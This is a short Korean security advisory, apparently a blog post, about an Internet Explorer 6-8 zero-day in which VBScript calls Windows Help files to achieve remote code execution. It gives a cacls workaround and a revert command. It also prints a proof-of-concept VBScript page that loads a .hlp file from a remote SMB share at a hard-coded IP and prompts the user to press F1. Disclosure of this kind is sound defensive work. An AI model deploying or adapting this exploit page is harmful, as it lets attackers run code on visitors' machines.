금일 인터넷 익스플로러에 대한 새로운 0-Day 취약점이 발표되었네요.
해당 취약점은 VBScript를 이용하여 Internet Explorer 6, 7, 8의 Windows Help(.hlp)를 호출할 수 있다고 합니다. 이러한 취약점을 이용하여 공격자는 원격지에서 원하는 코드를 실행할 수 있습니다. 게다가 Windows Help 에 대한 오버플로우 취약점 역시 존재 한다고 합니다.
현재 해당 취약점을 이용하여 실제 공격으로 이루어진 사례는 발견되지 않았지만 웹사이트 방문시 F1키의 입력을 요구한다면 누르지 않도록 주의하기 바랍니다.
그리고 패치가 나오기 전 아래 명령어를 이용하여 winhlp32.exe 파일에 대한 권한을 변경시켜 임시적으로 예방할 수 있습니다.
[권한 변경 방법]
cacls "%windir%\winhlp32.exe" /E /P everyone:N
[패치가 나온 후 복구 방법]
cacls "%windir%\winhlp32.exe" /E /R everyone
관련 POC 코드
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>